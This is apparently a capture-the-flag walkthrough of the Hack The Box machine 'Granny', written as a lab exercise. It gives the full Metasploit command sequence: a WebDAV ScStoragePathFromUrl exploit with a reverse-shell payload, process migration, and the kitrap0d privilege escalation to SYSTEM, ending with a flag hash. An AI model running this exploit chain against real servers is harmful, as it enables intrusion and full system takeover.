Walkthrough of HTB VM "Granny".
So, if you read the article on VM - Grandpa, this should be easy. There's not much new to learn from this, we just get a chance to play around with privs escalation, and some post exploitation, so nothing really to difficult.
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
|_ Server Date: Fri, 30 Apr 2021 12:36:38 GMTAgain we're up against a Webdav server, so we allready know an exploit for this. Let's fire up msfconsole.
msf6 > search webdav
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/osx/browser/safari_file_policy 2011-10-12 normal No Apple Safari file:// Arbitrary Code Execution
1 exploit/windows/misc/vmhgfs_webdav_dll_sideload 2016-08-05 normal No DLL Side Loading Vulnerability in VMware Host Guest Client Redirector
2 exploit/windows/scada/ge_proficy_cimplicity_gefebt 2014-01-23 excellent Yes GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
3 auxiliary/scanner/http/webdav_internal_ip normal No HTTP WebDAV Internal IP Scanner
4 auxiliary/scanner/http/webdav_scanner normal No HTTP WebDAV Scanner
5 auxiliary/scanner/http/webdav_website_content normal No HTTP WebDAV Website Content Scanner
6 exploit/windows/misc/ibm_director_cim_dllinject 2009-03-10 excellent Yes IBM System Director Agent DLL Injection
7 exploit/windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
8 exploit/windows/iis/ms03_007_ntdll_webdav 2003-05-30 great Yes MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
9 exploit/windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow
10 auxiliary/scanner/http/dir_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
11 auxiliary/scanner/http/ms09_020_webdav_unicode_bypass normal No MS09-020 IIS6 WebDAV Unicode Authentication Bypass
12 exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
13 exploit/windows/local/ms16_016_webdav 2016-02-09 excellent Yes MS16-016 mrxdav.sys WebDav Local Privilege Escalation
14 exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution
15 exploit/windows/iis/iis_webdav_upload_asp 2004-12-31 excellent No Microsoft IIS WebDAV Write Access Code Execution
16 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
17 exploit/windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution
18 exploit/windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
19 exploit/windows/http/sap_host_control_cmd_exec 2012-08-14 average Yes SAP NetWeaver HostControl Command Injection
20 exploit/windows/misc/webdav_delivery 1999-01-01 manual No Serve DLL via webdav server
21 exploit/multi/svn/svnserve_date 2004-05-19 average No Subversion Date Svnserve
22 exploit/multi/http/sun_jsws_dav_options 2010-01-20 great Yes Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
23 exploit/windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection
24 exploit/windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin Command Line Argument Injection
25 exploit/windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin Command Line Argument Injection
26 exploit/windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
27 exploit/windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker
28 exploit/windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
29 post/windows/escalate/droplnk normal No Windows Escalate SMB Icon LNK Dropper
30 exploit/windows/http/xampp_webdav_upload_php 2012-01-14 excellent No XAMPP WebDAV PHP Upload
Interact with a module by name or index. For example info 30, use 30 or use exploit/windows/http/xampp_webdav_upload_php
msf6 > use 16
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.13 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOST 10.129.2.63
RHOST => 10.129.2.63
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
[*] Started reverse TCP handler on 10.10.14.25:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.129.2.63
[*] Meterpreter session 1 opened (10.10.14.25:4444 -> 10.129.2.63:1030) at 2021-04-30 14:38:42 +0200
So, we got a meterpreter shell. We could assume that we need elevated rights to exploit the system with local exploits, so let's do that before we background meterpreter, and head to post modules.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
596 396 svchost.exe
680 396 svchost.exe
736 396 svchost.exe
784 396 svchost.exe
804 396 svchost.exe
956 396 spoolsv.exe
984 396 msdtc.exe
1104 396 cisvc.exe
1144 396 svchost.exe
1200 396 inetinfo.exe
1236 396 svchost.exe
1328 396 VGAuthService.exe
1428 396 vmtoolsd.exe
1480 396 svchost.exe
1620 396 svchost.exe
1788 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1832 396 alg.exe
1932 396 dllhost.exe
2476 596 wmiprvse.exe
2808 1480 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2884 596 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
3444 2808 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
meterpreter > migrate 1788
[*] Migrating from 3444 to 1788...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.129.2.63 - Collecting local exploits for x86/windows...
[*] 10.129.2.63 - 37 exploit checks are being tried...
[+] 10.129.2.63 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.2.63 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.2.63 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.2.63 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.2.63 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.2.63 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.2.63 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > show options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.13 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit
[*] Started reverse TCP handler on 10.10.14.25:4444
[*] Launching notepad to host the exploit...
[+] Process 220 launched.
[*] Reflectively injecting the exploit DLL into 220...
[*] Injecting exploit into 220 ...
[*] Exploit injected. Injecting payload into 220...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.129.2.63
[*] Meterpreter session 2 opened (10.10.14.25:4444 -> 10.129.2.63:1031) at 2021-04-30 14:41:07 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
And, we got SYSTEM. Let's find some flags.
meterpreter > search -f user.txt
Found 1 result...
c:\Documents and Settings\Lakis\Desktop\user.txt (32 bytes)
meterpreter > cat 'c:\Documents and Settings\Administrator\Desktop\root.txt'
aa4beed1c0584445ab463a6747bd06e9
cat 'c:\Documents and Settings\Administrator\Desktop\root.txt'
aa4beed1c0584445ab463a6747bd06e9
So, we're done. Did we learn something ?, well, not much except that we got a chance to revisit migration and some post exploitation stuff, so maybe that's good enough ?